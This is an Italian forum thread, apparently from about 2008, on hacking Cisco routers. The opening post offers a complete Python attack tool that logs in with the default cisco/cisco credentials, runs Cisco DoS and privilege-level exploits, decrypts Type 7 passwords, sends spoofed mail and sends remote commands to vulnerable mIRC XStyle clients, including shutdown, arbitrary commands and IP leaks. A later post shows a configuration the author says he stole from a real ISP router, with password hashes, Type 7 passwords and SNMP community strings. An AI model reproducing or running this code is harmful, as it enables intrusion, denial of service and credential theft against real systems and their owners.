I modi più semplici per hackerare un router cisco

Stato
Discussione chiusa ad ulteriori risposte.

uomosteriman

Utente Silver
8 Settembre 2007
14
0
0
62
1) usare password default (cisco / cisco) ,secondo una mia statistica :)lol:) nel 70% delle macchine c è l user cisco,e la password cisco.se si riesce ad accedere in questo modo è possibile utilizzare il router cisco per effettuare qualsiasi connessione tramite telnet.quindi si potrebbe usare come telnet proxy,per irc,per il web,per qualsiasi cosa.
se poi si vuole accedere come admin usando il comando "enable" potete riprovare "cisco","cisco" ,nella mia statistica ci accedi il 40% delle volte :)lol: ahaha) .quando si ha accesso al router come amministratore è possibile aprire,chiudere porte,usarlo come un firewall,fare qualsiasi cosa :p
2) si potrebbe ricorrere a diversi exploit funzionanti però con i routers un po piu vecchi
3) si puo usare un brute force
torniamo alla 1...ho fatto un programmino che vi permette di inserire solamente l ip,e il programma tenta di effettuare il login come "cisco","cisco" e se è possibile scrive su un file l ip,l user e la pass associata,dopo questo il programmino tenta di accedere come amministratore (sempre con quelle pass default) se riesce ad accedere salva il login da amministratore.
nel codice ci sono anche altri exploit per cisco,e anche la funzione di decifrare la pass.
la pass è dentro un file chiamato SDMconfig.txt (Security Device Manager) e in alcuni routers è possibile ottenerlo usando il comando wget http://ip/SDMconfig.txt .
il codice è questo (python)
Codice:
#!/usr/bin/python
import time
import socket
import os
from cisco_decrypt import CiscoPassword

print """
~~~~~~~~~~~~~~~~~~
~~~  Tools 1.0  ~~
~~~~~~~~~~~~~~~~~~
~~ By ^4st3r1X^ ~~
~~~~~~~~~~~~~~~~~~
1) Anonymail
2) Portscan
3) Traceroute
4) Lookup
5) Attack cisco default passwords
6) Cisco exploit "GET /%%"
7) Cisco auth level exploit
8) Cisco password decrypt
9) mIRC-XStyle Remote shell CTCP
"""
if os.path.exists("Lab_1.0") == True:
    pass
else:
    Lab = os.popen("mkdir ~/Lab_1.0")
def anon():
    print "\n~Anonimail~\n"
    ip = "smtp.nemesi.net"
    p = 25
    nome = raw_input("Inserisci il nome: ")
    mittente = raw_input("Inserisci il mittente: ")
    destinatario = raw_input("Inserisci il destinario: ")
    oggetto = raw_input("Inserisci l'oggetto: ")
    messaggio = raw_input("Inserisci il messaggio: ")
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try: 
        s.connect((ip, p))
        time.sleep(1)
        s.send("helo %s\n" % (nome))
        time.sleep(1)
        s.send("mail from:<%s>\n" % (mittente))
        time.sleep(1)
        s.send("rcpt to:<%s>\n" % (destinatario))
        time.sleep(1)
        s.send("data\n")
        time.sleep(1)
        s.send("from: %s <%s>\n" % (nome, mittente))
        time.sleep(1)
        s.send("subject: %s\n" % (oggetto)) 
        time.sleep(1)
        s.send("%s" % (messaggio))
        time.sleep(1)
        s.send("\n.\n")
        time.sleep(1)
        data = s.recv(100000)
        if data.find("250") != -1:
           print "\nInviato\n"
        else:
           print "\nInvio fallito\n"
    except socket.error,msg:
        print "\nImpossibile connettersi\n"
    finally:
        s.close()
        exit()
def cisco():
    print "\n~Cisco hack password~\n"
    ip = raw_input("ip: ")
    p = 23
    log = open('Lab_1.0/Cisco.log', 'a')
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    print "Connessione in corso: %s" % (ip)
    try:
        s.connect((ip, p))
        print "Connessione riuscita\n"
    except socket.error,msg:
        print "Connessione rifiutata\n"
        s.close()
        exit()
    time.sleep(1)
    data = s.recv(1000000)
    if data.find("Username:") != -1:
       print "Login in corso..."
       s.send("cisco\n")
       time.sleep(1)
       s.send("cisco\n")
       time.sleep(1)
       data = s.recv(100000)
       time.sleep(2)
       if data.find("% Login invalid") != -1:
          print "Login errato"
          exit()
       if data.find("% Bad passwords") != -1:
          print "Login errato"
          exit()
       if data.find("% Authentication failed") != -1:
          print "Login errato"
          exit()
       else:
          print ">>Login riuscito"
          s.send("enable\n")
          time.sleep(1)
          log.write("%s Login riuscito\nuser:cisco\npass:cisco\n" % (ip))
          print "Login come amministratore in corso..."
          s.send("cisco\n")
          time.sleep(1)
          data = s.recv(100000)
          time.sleep(1)
          if data.find("#") != -1:
             print ">>Login amministratore riuscito"
             log.write("%s Login admin riuscito\npass:cisco\n" % (ip))
          else:
             print "Login admin fallito"
             exit()
    if data.find("Password:") != -1:
       print "Login in corso..."
       s.send("cisco\n")
       time.sleep(1)
       data = s.recv(100000)
       time.sleep(1)
       if data.find("% Login invalid") != -1:
          print "Login errato"
          exit()
       if data.find("% Bad passwords") != -1:
          print "Login errato"
          exit()
       if data.find("Password:") != -1:
          print "Login errato"
          exit()
       else:
          print ">>Login riuscito"
          s.send("enable\n")
          time.sleep(1)
          log.write("%s Login riuscito\npass:cisco\n" % (ip))
          print "Login come amministratore in corso..."
          s.send("cisco\n")
          time.sleep(1)
          data = s.recv(100000)
          time.sleep(1)
          if data.find("#") != -1:
             print ">>Login amministratore riuscito"
             log.write("%s Login admin riuscito\npass:cisco\n" % (ip))
          else:
             print "Login admin fallito"
             exit()
    else:  
       print "Login errato"
       exit()
def scan():
    from time import strftime
    print "\n~Port scanner~\n"
    data = strftime("%d-%m-%Y %H:%M:%S")
    log = open('Lab_1.0/Scan.log', 'a')
    info = {
      1:'TCP Multiplexor',
      7: 'Echo',
      20: 'FTP',
      21: 'FTP',
      22: 'SSH',
      23: 'Telnet',
      25: 'SMTP',
      53: 'DNS',
      67: 'BOOTP Server',
      68: 'BOOTP Client',
      69: 'TFTP',
      70: 'Gopher',
      79:  'Finger',
      80: 'HTTP',
      88: 'Kerebros',
      110: 'POP-3',
      113: 'Auth',
      119: 'NNTP',
      139: 'Netbios',
      143: 'IMAP-4',
      443: 'HTTPS',
      445: 'Microsoft-DS',
      465: 'SMTP',
      631: 'Cups',
      666: 'Doom game',
      993: 'IMAP-4',
      995: 'POP-3',
      1011: 'Doly trojan',
      1012: 'Doly trojan',
      1080: 'Socks proxy',
      1234: 'Netbus',
      1337: 'Waste',
      1353: 'IBM lotus',
      1433:'SQL Server',
      1434: 'SQL Monitor',
      1521: 'Oracle',
      2081: 'Cpanel',
      2086: 'Web host manager',
      3050: 'Firebird database system',
      3128: 'HTTP Squid cache',
      3306: 'MySQL database system',
      3389: '(RDP) desktop remoto',
      4590: 'ICQ trojan',
      4662: 'eMule',
      4672: 'eMule',
      4711: 'eMule Web server',
      5000: 'plug-and-play',
      5060: 'SIP',
      5190: 'AOL instant messenger',
      5222: 'XMPP/Jabber Client Connection',
      5223: 'XMPP/Jabber SSL',
      5269: 'XMPP/Jabber Server Connection',
      5432: 'PostgreSQL Database system',
      5631: 'Symantec PcAnywhere',
      5632: 'Symantec PcAnywhere',
      5800: 'Ultra VNC (HTTP)',
      5900: 'Ultra VNC (Main)',
      6000: 'X-11',
      6660: 'IRC',
      6661: 'IRC',
      6662: 'IRC',
      6663: 'IRC',
      6664: 'IRC',
      6665: 'IRC',
      6666: 'IRC',
      6667: 'IRC',
      6668: 'IRC',
      6669: 'IRC',
      6881: 'Bit torrent',
      6969: 'Bit torrent',
      8000: 'iRDMI',
      8080: 'Proxy',
      8118: 'Privoxy',
      9009: 'Pichat',
      9050: 'Tor',
      12345: 'Netbus',
      12346: 'Netbus',
      27960: 'Quake 3',
      31337: 'Back Orifice',
      41951: 'TVersity Media Server',
}
    ip = raw_input("Inserisci l'host: ")
    inizio = input("Inserisci la porta d'inzio scansione: ")
    fine = input("Inserisci la porta di fine scansione: ")
    print "\nInzio scansione dalla porta %s alla porta %s sull'host %s\n" % (inizio, fine, ip)
    log.write("%s - Inzio scansione dalla porta %s alla porta %s sull'host %s\n" % (data, inizio, fine, ip))
    if fine < inizio:
       fine = inizio
    porte = []
    for p in range(inizio, fine+1):
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        try:
            s.connect((ip,p))   
            porte.append(p)
            if len(porte) > 0:
               if p in info:
                  print "Aperta la porta %s Info: %s" % (p, info[p])
                  log.write("Aperta la porta %s Info: %s\r" % (p, info[p]))
               else:
                  print "Aperta la porta %s Info: Sconosciuta" % (p)
                  log.write("Aperta la porta %s Info: Sconosciuta\r" % (p))
        except socket.error,msg:
            pass
        finally:
            s.close()
    if not porte:
       print "\nNon ci sono porte aperte"
       log.write("Nessuna porta aperta\n")
    print "\nScansione terminata"
    log.write("Scansione terminata\n\n")
    exit()
def lookup():
    print "\n~Lookup hostname~\n"
    ip = raw_input("Inserisci l'hostname: ")
    data = os.popen("nslookup %s" % (ip))
    print data.read()
def tracer():
    print "\n~Traceroute~\n"
    ip = raw_input("Inserisci l'hostname: ")
    print "Traceroute in corso"
    data = os.popen("traceroute %s" % (ip))
    print "Resoconto:\n"
    print data.read()
def cdecry():
    print "\n~Cisco password decrypt~\n"
    Crack = CiscoPassword()
    Pass = raw_input("Inserisci la password criptata: ")
    Password = Crack.decrypt(Pass)
    if len(Password) > 0:
       print "Pass crackata:\nPassword: %s" % (Password)
    else:
       print "Pass non crackata\n"
def ciscoh():
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    print "\n~Cisco GET /%% HTTP/1.0 Exploit~\n"
    ip = raw_input("Ip cisco: ")
    p = 80
    try:
        print "Connessione in corso"
        s.connect((ip, p)) 
        print "Connesso"
        time.sleep(1)
        print "Invio pacchetto DoS in corso"
        s.send("GET /%% HTTP/1.0\n\r")
        s.send("\n")
        print "Pacchetto DoS inviato"
    except socket.error,msg:
        print "Connessione rifiutata"
        exit()
    data = s.recv(100)
    time.sleep(2)
    if data.find("401 Unauthorized") != -1:
        print "Exploit fallito\n"
    else:
        print "Exploit riuscito\n"
def authcisco():
    print "\n~Cisco http auth level DoS~\n"
    ip = raw_input("Ip cisco: ")
    p = 80
    sp = "%20"
    for vuln in range(16, 100):
        exploit = "GET /level/%s/exec/show%sprivilege HTTP/1.0\n\r" % (vuln, sp)
        try:
            s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            s.connect((ip,p))
            print "Attacco in corso 'level %s'" % (vuln)
            s.send(exploit)
            s.send("\n\r")
            data = s.recv(1000)
            time.sleep(1)
            if data.find("/Current privilege level is/") != -1:
               print "Trovata vulnerabilita' su 'level %s'" % (vuln)
            else:
               print "Nessuna vulnerabilita' trovata su 'level %s'" % (vuln)
        except:
            print "Connessione rifiutata\n"
            exit()
def xstyle():
    import time
    print "\n~XStyle remote control CTCP~\n"
    serv = raw_input("Server irc (ip): ")
    p = 6667
    ID = "XStyle"
    nome = "www.xstylescript.tk"
    nick = "XStyle243"
    scelta = input("1)Usa proxy\n2)Prosegui\n\nScelta: ")
    if scelta == 1:
       s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
       proxy = raw_input("Ip proxy: ")
       proxyp = input("Porta proxy: ")
       proxyus = raw_input("Username proxy: ")
       proxypas = raw_input("Password proxy: ")
       try:
          s.connect((proxy, proxyp))
          s.send(proxyus +"\n")
          time.sleep(1)
          s.send(proxypas +"\n")
          time.sleep(2)
          s.send("telnet %s %s\r\n" % (serv, p))
          time.sleep(2)
          s.send("nick %s\r\n" % (nick))
          time.sleep(2)
          s.send("user %s %s %s : %s\r\n" % (ID, ID, ID, nome))
          print "Connesso\n\n"
          vittima = raw_input("Inserisci il nick per l'exploit: ")
          if len(vittima) > 0:
             s.send("PRIVMSG %s :VERSION\n" % (vittima))
             print "Attacco in corso\n"
             time.sleep(15)
             data = s.recv(10000)
             if data.find(">X< Style") != -1:
                print """Possibile vulnerabilita' trovata nel client del nick %s
                Cosa desideri fare?
                1) Spegni computer
                2) Riavvia computer
                3) Disconnetti da irc
                4) Cambia nick
                5) Scopri ip
                6) Inserisci comando""" % (vittima)
                scelta = input("Scelta: ")
                hck = "Attacco inviato\n"
                if scelta == 1:
                   tim = input("Imposta timer: ")
                   mesg = raw_input("Messaggio spegnimento: ")
                   cmdsp = "PRIVMSG %s :VERSION | { .run shutdown -s -t %s -c ""%s"" | halt }\n" % (vittima, tim, mesg)
                   s.send(cmdsp)
                   print hck
                   time.sleep(2)
                   exit()
                elif scelta == 2:
                   s.send("PRIVMSG %s :VERSION | { .run shutdown -r | halt }\n" % (vittima))
                   print hck
                   time.sleep(1)
                   exit()
                elif scelta == 3:
                   qmsg = raw_input("Messaggio quit: ")
                   s.send("PRIVMSG %s :VERSION | { .quit %s | halt }\n" % (vittima, qmsg))
                   print hck
                   time.sleep(2)
                   exit()
                elif scelta == 4:
                   vnick = raw_input("Nuovo nick vittima: ")
                   s.send("PRIVMSG %s :VERSION | { .nick %s | halt }\n" % (vittima, vnick))
                   print hck
                   time.sleep(2)
                   exit()
                elif scelta == 5:
                   chk = "#XStyleHacked"
                   s.send("JOIN %s\n" % (chk))
                   time.sleep(1)
                   s.send("MODE %s +si\n" % (chk))
                   s.send("PRIVMSG %s :VERSION | { .msg %s IP: $ip | halt }\n" % (vittima, chk))
                   print hck
                   time.sleep(2)
                   print "Attendere..."
                   time.sleep(13)
                   data = s.recv(10000)
                   if data.find("IP: ") != -1:
                      print hck
                      print "Sniffato pacchetto tcp contenente l'ip"
                      print data
                      exit()
                   else:
                      print "Attacco fallito"
                      exit()
                elif scelta == 6:
                    cmd = raw_input("Comando: ")
                    s.send("PRIVMSG %s :VERSION | { .%s | halt }\n" % (vittima, cmd))
                    print hck
                    time.sleep(1)
                    exit()
                else:
                    print "Scelta errata"
                    exit()
             else: 
                print "Impossibile eseguire l'attacco"
                exit() 
       except socket.error,msg:
          print "Connessione fallita" 
          exit()
    if scelta == 2:
       s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
       try:
          s.connect((serv, p))
          s.send("nick %s\n" % (nick))
          s.send("user %s %s %s : %s\n" % (ID, ID, ID, nome))
          print "Connesso\n\n"
          vittima = raw_input("Inserisci il nick per l'exploit: ")
          if len(vittima) > 0:
             s.send("PRIVMSG %s :VERSION\n" % (vittima))
             print "Ricerca vulnerabilita' in corso...\n"
             time.sleep(25)
             data = s.recv(10000)
             if data.find(">X< Style") != -1:
                print """Possibile vulnerabilita' trovata nel client del nick %s
                Cosa desideri fare?
                1) Spegni computer
                2) Riavvia computer
                3) Disconnetti da irc
                4) Cambia nick
                5) Scopri ip
                6) Inserisci comando (windows)""" % (vittima)
                scelta = input("Scelta: ")
                hck = "Attacco inviato\n"
                if scelta == 1:
                   tim = input("Imposta timer: ")
                   mesg = raw_input("Messaggio spegnimento: ")
                   cmdsp = "PRIVMSG %s :VERSION | { .run shutdown -s -t %s -c ""%s"" | halt }\n" % (vittima, tim, mesg)
                   s.send(cmdsp)
                   print hck
                   time.sleep(3)
                   exit()
                elif scelta == 2:
                   s.send("PRIVMSG %s :VERSION | { .run shutdown -r | halt }\n" % (vittima))
                   print hck
                   time.sleep(2)
                   exit()
                elif scelta == 3:
                   qmsg = raw_input("Messaggio quit: ")
                   s.send("PRIVMSG %s :VERSION | { .quit %s | halt }\n" % (vittima, qmsg))
                   print hck
                   time.sleep(1)
                   exit()
                elif scelta == 4:
                   vnick = raw_input("Nuovo nick vittima: ")
                   s.send("PRIVMSG %s :VERSION | { .nick %s | halt }\n" % (vittima, vnick))
                   print hck
                   time.sleep(2)
                   exit()
                elif scelta == 5:
                   chk = "#XStyleHacked"
                   s.send("JOIN %s\n" % (chk))
                   time.sleep(1)
                   s.send("MODE %s +si\n" % (chk))
                   s.send("PRIVMSG %s :VERSION | { .msg %s IP: $ip | halt }\n" % (vittima, chk))
                   print hck
                   time.sleep(2)
                   print "Attendere..."
                   time.sleep(13)
                   data = s.recv(10000)
                   if data.find("IP: ") != -1:
                      print "Attacco riuscito"
                      print "Sniffato pacchetto tcp contenente l'ip"
                      print data
                      exit()
                   else:
                      print "Attacco fallito"
                      exit()
                elif scelta == 6:
                   cmd = raw_input("Comando: ")
                   s.send("PRIVMSG %s :VERSION | { .%s | halt }\n" % (vittima, cmd))
                   print hck
                   time.sleep(2)
                   exit()
                else:
                   print "Scelta errata"
                   exit()
             else: 
                print "Impossibile eseguire l'attacco"
                exit() 
          else:
             print "Errore\n"
             exit()
       except socket.error,msg:
          print "Connessione fallita" 
          exit()
    while True:
       try:
          dat = s.recv(1000)
       except socket.error,msg:
          print "Quit"
          exit()
       if dat.find ('PING') != -1:
          s.send('PONG ' + dat.split()[1] + '\r\n')

scelta = input("Scelta: ")
if scelta == 1:
   anon()
elif scelta == 2:
   scan()
elif scelta == 3:
   tracer()
elif scelta == 4:
   lookup()
elif scelta == 5:
   cisco()
elif scelta == 6:
   ciscoh()
elif scelta == 7:
   authcisco()
elif scelta == 8:
   cdecry()
elif scelta == 9:
   xstyle()
else:
   print "Scelta errata"
#by ^4st3r1X^
 
ma chi è il responsabile della sicurezza di quelle aziende ? cocozza? :asd:

proprio su un router cisco anche :lol:
 
malossi_trofeo ha detto:
ma chi è il responsabile della sicurezza di quelle aziende ? cocozza? :asd:

proprio su un router cisco anche :lol:

ghghghghgh spetta questo è l sdmconfig.txt preso grazie a un mio hack su un router della medianet/wind:
Codice:
!This is the running config of the router: 151.12.XX.XX

!----------------------------------------------------------------------------

!version 12.4

service timestamps debug datetime localtime

service timestamps log datetime localtime

service password-encryption

!

hostname medianet-carbonia

!

boot-start-marker

boot-end-marker

!

card type e3 1

logging buffered 20000 debugging

enable secret 5 $1$9zHF$kr214fE817loPxPzEAdCl.

enable password 7 141A170F0505242E30786B

!

no aaa new-model

!

resource policy

!

clock timezone MET 1

clock summer-time MET recurring last Sun Mar 2:00 last Sun Oct 3:00

!

!

ip cef

!

!

ip domain name yourdomain.com

!

!

crypto pki trustpoint TP-self-signed-3186752428

 enrollment selfsigned

 subject-name cn=IOS-Self-Signed-Certificate-3186752428

 revocation-check none

 rsakeypair TP-self-signed-3186752428

!

!

crypto pki certificate chain TP-self-signed-3186752428

 certificate self-signed 01

  30820259 308201C2 A0030201 02020101 300D0609 2A864886 F70D0101 04050030 

  31312F30 2D060355 04031326 494F532D 53656C66 2D536967 6E65642D 43657274 

  69666963 6174652D 33313836 37353234 3238301E 170D3038 30343132 31323238 

  35385A17 0D323030 31303130 30303030 305A3031 312F302D 06035504 03132649 

  4F532D53 656C662D 5369676E 65642D43 65727469 66696361 74652D33 31383637 

  35323432 3830819F 300D0609 2A864886 F70D0101 01050003 818D0030 81890281 

  8100BFF0 4C0B0D37 0B4E594F F099BAC7 F554C59F 5A85F572 5FE75659 F7556F88 

  36929FCF 5B5E5B45 3DB7CC9F 9834720D 057DF48B A782F335 E4BCC5F2 551897D0 

  B7AA25D1 29BE6B93 3538CDB7 299D2280 1266BD42 5FFFB464 82767298 8794E184 

  AB1B73D1 6654E39D 4F78B111 E05470F6 FB6CE0CE 740B5065 8540FEFB 94562515 

  E1310203 010001A3 8180307E 300F0603 551D1301 01FF0405 30030101 FF302B06 

  03551D11 04243022 82206D65 6469616E 65742D63 6172626F 6E69612E 796F7572 

  646F6D61 696E2E63 6F6D301F 0603551D 23041830 168014CF 240EF350 A92D1538 

  6E0B0568 420BAB2A 9C544E30 1D060355 1D0E0416 0414CF24 0EF350A9 2D15386E 

  0B056842 0BAB2A9C 544E300D 06092A86 4886F70D 01010405 00038181 00329CE9 

  A495D95E 9E26F71B E98AF083 6304CD10 1B8761E9 8AC89C05 8AD67C86 94A38B62 

  839A0741 A7E96B7D 71FF3BBD EAB9F25A D9C9AA8B 89B76632 A3A9E0CF 1213D330 

  C13FA0F7 D4E15D67 3E31683F 8C0BD9FF DB64ADC3 390C64C7 3074CB71 93B59DDF 

  A0BF2D90 A353FF6F 41DAE3CB 522950C8 E940472B 4BF82497 7BC1296F 9D

  quit

username cisco privilege 15 secret 5 $1$fjBU$PugTY7GLqCHTj7wY6KuIJ1   <--------- :lol:

username infocisco privilege 15 password 7 045205000022455D0A16 <------ :lol:

username tacinternet privilege 15 password 7 010707070A525F56 <------- :lol:

username boda password 7 0822455D0A16 <------ :lol:

username medianet privilege 5 password 7 04560E0206205B47071D <-------- :lol:

!

!

controller E3 1/0

 framing bypass

!

!

interface GigabitEthernet0/0

 description LAN CLIENTE

 ip address 151.12.XX.XX 255.255.255.252

 duplex full

 speed auto

!

interface GigabitEthernet0/1

 description NON UTILIZZATA

 no ip address

 shutdown

 duplex auto

 speed auto

!

interface Serial1/0

 description LINK 34 Mb CARBONIA/00B-ROMA/LJW-A34M-1 RMSA-E01 E3 2/0/0

 mtu 1500

 ip address 151.5.xx.xx 255.255.255.252

 ip access-group 137 in

 no ip route-cache cef

 no ip route-cache

 no ip mroute-cache

 load-interval 30

 dsu bandwidth 34010

!

ip route 0.0.0.0 0.0.0.0 151.5.xx.xx name RMSA-E01

ip route 92.245.164.xx 255.255.252.0 151.12.xx.xx

ip route 151.12.xx.xx 255.255.255.0 151.12.xx.xx name subnetcliente

ip route 151.12.89.xx 255.255.255.0 151.12.xx.xx name subnetcliente

ip route 151.12.90.0 255.255.255.0 151.12.91.2 name subnetcliente

ip route 151.12.91.0 255.255.255.0 151.12.91.2 name subnetcliente

ip route 213.178.222.0 255.255.254.0 151.12.91.2 name CustomerRipassigned

ip route 213.178.223.254 255.255.255.255 151.12.91.xx name peerBGP

!

no ip http server

ip http authentication local

ip http secure-server

ip http timeout-policy idle 5 life 86400 requests 10000

!

access-list 3 permit 213.178.223.243

access-list 3 permit 161.27.15.0 0.0.0.255

access-list 4 permit 213.178.223.243

access-list 4 permit 151.5.160.201

access-list 4 permit 161.27.15.0 0.0.0.255

access-list 4 permit 151.12.83.0 0.0.0.255

access-list 137 deny   tcp any host 213.178.223.249 eq 22

access-list 137 deny   tcp any host 213.178.223.253 eq 22

access-list 137 deny   tcp any host 213.178.223.254 eq 22

access-list 137 deny   tcp any host 213.178.223.249 eq telnet

access-list 137 deny   tcp any host 213.178.223.253 eq telnet

access-list 137 deny   tcp any host 213.178.223.254 eq telnet

access-list 137 deny   tcp any host 213.178.223.249 eq 2601

access-list 137 deny   tcp any host 213.178.223.253 eq 2601

access-list 137 deny   tcp any host 213.178.223.254 eq 2601

access-list 137 deny   tcp any host 213.178.223.249 eq 2604

access-list 137 deny   tcp any host 213.178.223.253 eq 2604

access-list 137 deny   tcp any host 213.178.223.254 eq 2604

access-list 137 deny   tcp any host 213.178.223.249 eq 2605

access-list 137 deny   tcp any host 213.178.223.253 eq 2605

access-list 137 deny   tcp any host 213.178.223.254 eq 2605

access-list 137 permit ip any any

snmp-server community public RO 4

snmp-server community cominfo RO

snmp-server community netcontrol RW 4

!

control-plane

!

banner login ^C

-----------------------------------------------------------------------

Cisco Router and Security Device Manager (SDM) is installed on this device. 

This feature requires the one-time use of the username "cisco" 

with the password "cisco".



Please change these publicly known initial credentials using SDM or the IOS CLI. 

Here are the Cisco IOS commands.



username <myuser>  privilege 15 secret 0 <mypassword>

no username cisco



Replace <myuser> and <mypassword> with the username and password you want to use. 



For more information about SDM please follow the instructions in the QUICK START 

GUIDE for your router or go to http://www.cisco.com/go/sdm 

-----------------------------------------------------------------------

^C

banner motd ^CC

********************************************************

**                Vietato l'accesso                   **

**                                                    **

**               MEDIANET CARBONIA                    **

**             WIND TELECOMUNICAZIONI                 **

**            SERVIZIO NETRIDE - IPNET                **

**                                                    ** 

********************************************************

^C

!

line con 0

 privilege level 15

 password 7 1218111405025C57

 login

line aux 0

 password 7 03095E0F0F0E2F495A5941

 login

 modem InOut

line vty 0 4

 access-class 3 in

 privilege level 15

 password 7 045A18120A334556584C55434B5B

 login local

 transport input telnet ssh

 transport output telnet ssh

line vty 5 15

 access-class 3 in

 privilege level 15

 password 7 045A1F0518281C1D

 login local

 transport input telnet ssh

!

scheduler allocate 20000 1000

ntp server 161.27.15.65

sntp server 193.204.114.105

sntp server 161.27.15.65

sntp server 193.204.114.232

!

end
ahahhaha tutti gli utenti e le pass in un colpo solo
schermata3hm9.png
 
tutto questo però penso sia possibile solo nel caso in cui sia abilitato il management del router da remoto, altrimenti non ti connetti...

P.S. Meglio se le immagini le metti in tag OT, sennò deformano tutto e nun si capisce na mazza. :asd:
 
Mast3rB0und ha detto:
tutto questo però penso sia possibile solo nel caso in cui sia abilitato il management del router da remoto, altrimenti non ti connetti...

P.S. Meglio se le immagini le metti in tag OT, sennò deformano tutto e nun si capisce na mazza. :asd:

si certo :p , ma tutti i router provider hanno la https aperta per modificare i servizi da remoto :p perchè magari il tecnico non sta dove c è il cisco ma in un altro paese (come nel mio caso,il router è un provider della linea medianet(mediamerd) e wind e si trova a carbonia ma il tecnico era ad olbia.
quando ero entrato mi aveva "sgamato" il tecnico.e si era incazzato :p però mi aveva lasciato perdere (meglio, lo ringrazio ^^' )
 
[ot]ho l'ipressione che il mio ruolo di pythoniano sia ormai da abdicare in favore di questo nuovo utente :chesofatt: [/ot]
 
opocaj ha detto:
Malex ha detto:
[ot]ho l'ipressione che il mio ruolo di pythoniano sia ormai da abdicare in favore di questo nuovo utente :chesofatt: [/ot]
Ehm, prima il migliore ero io :rulz:

[ot]modesto come sempre xd, cmq nn ho detto di essere il migliore, ho detto di essere Il Pythoniano, tu ti dedicavi anche ad altri linguaggi...[/ot]
 
Malex ha detto:
opocaj ha detto:
Malex ha detto:
[ot]ho l'ipressione che il mio ruolo di pythoniano sia ormai da abdicare in favore di questo nuovo utente :chesofatt: [/ot]
Ehm, prima il migliore ero io :rulz:

[ot]modesto come sempre xd, cmq nn ho detto di essere il migliore, ho detto di essere Il Pythoniano, tu ti dedicavi anche ad altri linguaggi...[/ot]
[ot]Sese, cambia messaggio in corsa xD[/ot]
 
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa

che termine è "hackerare"? oh mio dio che delusione *_*

Hackare. x la prossima volta, se proprio la devi italianizzare.

( scusate l'OFF ma dovevo proprio dirlo )
 
quoto tr4ks...puoi usare un termine più appropriato al posto di "hackerare",che ne so bypassare,raggiare o quello che vuoi,ma non facciamo i bimbi che diciamo hackerare xD!
 
R4z0r_Cr4$H ha detto:
quoto tr4ks...puoi usare un termine più appropriato al posto di "hackerare",che ne so bypassare,raggiare o quello che vuoi,ma non facciamo i bimbi che diciamo hackerare xD!

si,ma uso sempre il termine bypassare lol volevo solo usare un termine diverso :hail:
 
Stato
Discussione chiusa ad ulteriori risposte.